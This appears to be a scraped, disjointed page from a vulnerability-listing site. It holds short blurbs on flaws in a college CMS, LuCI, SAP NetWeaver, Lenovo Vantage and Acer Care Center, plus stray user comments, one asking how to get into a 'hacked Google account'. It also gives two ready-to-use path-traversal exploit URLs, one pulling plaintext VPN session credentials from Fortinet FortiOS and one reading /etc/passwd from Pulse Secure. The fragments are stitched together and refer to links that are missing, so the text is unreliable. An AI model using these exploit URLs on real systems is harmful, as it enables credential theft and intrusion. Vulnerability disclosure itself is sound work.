College Website CMS had an SQL injection into the department id parameter. discovered by Ayed Alqahtani (lus33r)

This vulnerability involves a rather unconventional vector for XSS - the comment field of an SSH public key. Since patched in newer versions of LuCI, which ensure to not display public key comments verbatim in order to prevent injection of any markup, including <script> tags.

The critical vulnerability was discovered by RedRays R&D center in SAP NetWeaver AS JAVA in ME module

Lenovo Commercial Vantage Tool Local Privilege Escalation:

Would this work for my hacked Google account so I can gain access

If you are looking for the Samba vulnerability click the link below:

Acer ships most of the laptop it sells with a software suite called Care Center Service installed. In versions up to 4.00.3034 included, one of the suite’s programs is an executable named ListCheck.exe, which runs at logon with the highest privilege available and suffers from a phantom DLL hijacking. This can lead to a privilege escalation when an administrator logs in. Blogpost:

Fortinet FortiOS Path Traversal Retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Getting passwd content with Pulse Secure unauthenticated path traversal: https://localhost/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

If you have permission to modify the configuration file, then you already got the machine. How can it be a vulnerability?